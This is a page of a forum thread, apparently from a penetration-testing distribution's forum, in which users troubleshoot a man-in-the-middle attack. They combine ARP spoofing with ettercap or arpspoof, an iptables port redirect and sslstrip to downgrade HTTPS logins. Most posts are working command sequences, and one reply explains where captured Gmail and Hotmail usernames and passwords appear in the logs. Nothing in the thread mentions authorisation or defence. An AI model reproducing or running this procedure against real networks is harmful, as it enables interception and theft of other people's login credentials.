Page 1 of 3 123 LastLast
Results 1 to 10 of 23

Thread: Ettercap+Sslstrip

  1. #1
    Just burned his ISO
    Join Date
    May 2011
    Posts
    5

    Default Ettercap+Sslstrip

    I have a problem using Ettercap and Sslstrip. If I uncomment iptables on etter.conf, ettercap takes over ssl, and the browser gives certificate errors. If I keep ignoring the errors, I eventually get logged in. If I keep the iptables commented on etter.conf, sslstrip seems to take over ssl connections and catches the login info. However, the browser gets redirected back to login page. Basically, I can't log in. Looking at the log, everything is forwarded and spoofed correctly. How can I fix this?

  2. #2
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    Would you please post instructions you are typing? That would give the members a better perception of your problem..
    In my case, so far, have not had any succsess at all in using ettercap, ettercap + sslstrip or sslstrip alone...At all...

  3. #3
    Member
    Join Date
    Sep 2010
    Location
    Eastern Island
    Posts
    96

    Default Re: Ettercap+Sslstrip

    that is a bug

  4. #4
    Just burned his ISO
    Join Date
    May 2011
    Posts
    5

    Default Re: Ettercap+Sslstrip

    Here are my commands.

    sudo -i
    echo 1 > /proc/sys/net/ipv4/ip_forward
    exit
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sudo sslstrip -a -k -f
    sudo ettercap -Tqd -i eth1 -M arp:remote /192.168.1.200/ /192.168.1.1/

    or

    sudo arpspoof -i eth1 -t 192.168.1.200 192.168.1.1
    sudo arpspoof -i eth1 -t 192.168.1.200 192.168.1.1
    sudo ettercap -Tqd -i eth1

    This is a bug? I'm not the only one experiencing this?

  5. #5
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    At last I was able to make it work: sslstrip and ettercap + sslstrip..
    You would have to read the man ettercap...Here is where I began...I had seen many videos regarding that matter, but never got it to work until yesterday..
    As for ettercap, I want to post this:
    ettercap -Tqi ethX: Wheter you have uncommented the iptables section, you are just
    forwarding and listenning in ethX or whatever your interface is.
    This is stated in the "man ettercap". So you do not need to use
    the echo 1 > /proc/sys/net/......./ip_forward.
    ettercap -Tqi ethX -u : You are just listenning but not forwarding due to the -u
    parameter (--unoffensive)..In this case, you have to
    forward manually (echo 1 > /proc/sys/.../ip_forward)
    Do you want to test this?..Open a Terminal and run echo 1 > /proc/sys/net/......./ip_forward...Then type cat /proc/sys/net/ipv4/ip_forward and you should get a "1"
    meanning you are forwarding. In another Terminal type: ettercap -Tqi ethX -u, here
    you are only listening in ethX but NOT forwarding, get back to the firts terminal where you typed the echo 1 > /proc/sys.../ip_forwarding and check the forwarding, by typing again cat /proc/sys../ip_forwarding..You will get a "1"...
    But if you type: ettercap -Tqi ethX, back to the second terminal and check again the cat command to see if you have a "1", you will see that the forwarding from kernel is now "0", NOT forwarding, because now ettercap is doing that..
    So, if you want to arpspoof, you can do it 2 ways:
    ettercap -Tqi ethX -M arp /target/ /GW/..You are doing 2 things here:
    1. Forwarding
    2. ARP spoofing..
    If you type:
    ettercap -Tqi ethX -u -M arp /target/ /GW/, you will get an error saying that cannot use a MITM attack with an "unoffensive" -u..So, if you use the first attack, you do 2 things as mentioned...So now in another terminal you use the iptables and then run the sslstrip..(sslstrip -p -f), the default port is 10000...
    This way, using the sslstrip as ssl disector, you wont get the "certificate" error...
    This is the way I made it work for me...
    If you want to use the ettercap only to listen, just make it run without forwarding using the -u parameter..But then, you would have to forward it manually with the echo 1 command..Then arpspoof in both ways with arpspoof and then use the iptables and sslstrip...
    If you want to use the ettercap and disect ssl with sslstrip, just forward and arpspoof with it:
    ettercap -Tqi ethX -M arp /target/ /GW/ (in one terminal)
    iptables and sslstrip -p -f (-p to log only ssl traffic)

    If you want to use ettercap as listener and sslstrip:
    1. forward manually with echo 1
    2. arpspoof both ways with arpspoof -i ethx -t ...
    3. start ettercap as listener and grab traffic in a file:
    ettercap -Tqi ethX -u -l my_ssl_data
    4. Start iptables and run sslstrip -p -f
    5. If you run in this way ettercap, open another terminal and re-check the forwarding you did manually wit: cat /proc/sys.../ip_forward..and you will see that is "1", because ettercap is running with -u, without forwarding..

    All this guys is in the ettercap man..Just read it...

    Just check the sslstrip.log and you will see a lot of info, but the user and passwor are ther:
    gmail: Email=xxxx@gmail.com&passwd=xxxxx
    hotmail: user=xxxx@hotmail.com&passwd=xxxx
    The info in ettercap files with -l parameter, should be my_data_ssl.eci, open it with etterlog...You shoul install the etterlog (aptitude install ettrelog)

    Hope this helps you..I did work for me after 4 monts of watching videos and reading posts..

    Good luck..

    I'm using karmic with ettercap, sslstrip (0.6, 0.7, 0.9), dell laptop single core and also a generic white box dual core as desktop....

    If you want to use only ettercap:
    1. you

  6. #6
    Just burned his ISO
    Join Date
    May 2011
    Posts
    5

    Default Re: Ettercap+Sslstrip

    Thanks! it solved certificate errors!
    Still, if I try to log into Gmail, it keeps redirect me back to the log in page. I can see the captured user and password on ettercap. This is what I did.
    sudo ettercap -Tqdi ethX -M arp:remote /target/ /router/
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sudo sslstrip -a -k -f

    When I open gmail, I don't see the certificate error anymore even with iptables uncommented on etter.conf. Yea! I can't log in though.
    Of course I skipped "echo 1 > /proc/sys/net/ipv4/ip_forward" as you suggested.
    I assume sslstrip only works on http? I still get certificate on imap and pop3. I just don't get on https.
    Thanks for all your help!

  7. #7
    Junior Member
    Join Date
    Mar 2007
    Posts
    28

    Default Re: Ettercap+Sslstrip

    has anyone else tried maverik35's soln?

  8. #8
    Just burned his ISO
    Join Date
    Apr 2011
    Location
    Tunisia
    Posts
    3

    Default Re : Re: Ettercap+Sslstrip

    why ettercap can't sniff http traffic. It work properly in backtrack 4 release

  9. #9
    Junior Member
    Join Date
    Mar 2007
    Posts
    28

    Default Re: Ettercap+Sslstrip

    i still cant get sslstrip to actually 'strip ssl" (yea, i know thats not what it's actually doing) even if i adjust my nat table for redirecting destination port to include 443. I am also once in a while getting the same error as this gent:
    http://www.backtrack-linux.org/forum...-ettercap.html

    but not one seems to have figured it out either

    EDIT: To anyone who is stuck like i was. Finally got mine working. The trick was sudo'ing sslstrip as well as ettercap, and listening on the default port (no -l option). Ended up using ms282's routine, except at the end: sudo sslstrip -fk
    Hope that helps someone.
    Last edited by charlietaco; 05-30-2011 at 11:44 AM. Reason: didn't read all of the posts above. removed dup stuff now.

  10. #10
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    Quote Originally Posted by ms282 View Post
    Thanks! it solved certificate errors!
    Still, if I try to log into Gmail, it keeps redirect me back to the log in page. I can see the captured user and password on ettercap. This is what I did.
    sudo ettercap -Tqdi ethX -M arp:remote /target/ /router/
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sudo sslstrip -a -k -f

    When I open gmail, I don't see the certificate error anymore even with iptables uncommented on etter.conf. Yea! I can't log in though.
    Of course I skipped "echo 1 > /proc/sys/net/ipv4/ip_forward" as you suggested.
    I assume sslstrip only works on http? I still get certificate on imap and pop3. I just don't get on https.
    Thanks for all your help!
    Great it worked for you..As sslstrip is concerned, it should work.
    You can try this: iptables -t nat --flush (flush the iptables, it flushes all appended chains to tables, in this case -A PREROUTING -p tcp --destination-port 80).
    Then re-type or re-enter the chain to the Table: iptables -t nat - A PREROUTING.......--to-port 10000
    sslstrip -p -f (I suggest to log only ssl posts which is the default)..Remember that the default port to listen for sslstrip is 10000, so no need to use the -l 10000.
    the log file will be left on the desktop if you are using BT, if you are using Ubuntu it will be left in the /home/root/ directory, in both cases as sslstrip.log unless you use the -w option and give a path and name lo save the file.
    If you want to see the file "live" as it runs, open another terminal and type:
    tail -f my_ssldata.log this way you will see every http or https traffic as you navigate thru, off course dpending on the ssl parameters you use (-p, -a)...I used both and the amount of info with -a is too much, unless you want to make a more deep study of traffic, use the -p option (default)..The -f is to show the little favicon showing that is a "secure page"..
    then re-run ettercap...Try it.....
    Best of luck...

Page 1 of 3 123 LastLast

Similar Threads

  1. Problema con Ettercap & Sslstrip
    By mapoetto in forum Discussioni Generali
    Replies: 1
    Last Post: 04-14-2011, 10:30 PM
  2. Ettercap and Sslstrip problem
    By f4llcon in forum Beginners Forum
    Replies: 5
    Last Post: 11-02-2010, 05:26 PM
  3. problems with arpspoof, sslstrip, ettercap
    By username324 in forum Beginners Forum
    Replies: 9
    Last Post: 03-12-2010, 12:02 AM
  4. ettercap & sslstrip question
    By mroy1300 in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-01-2010, 01:55 AM
  5. Ettercap & SslStrip (Attacking the Masses)
    By htons139 in forum OLD BackTrack3 Howtos
    Replies: 11
    Last Post: 01-11-2010, 02:16 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •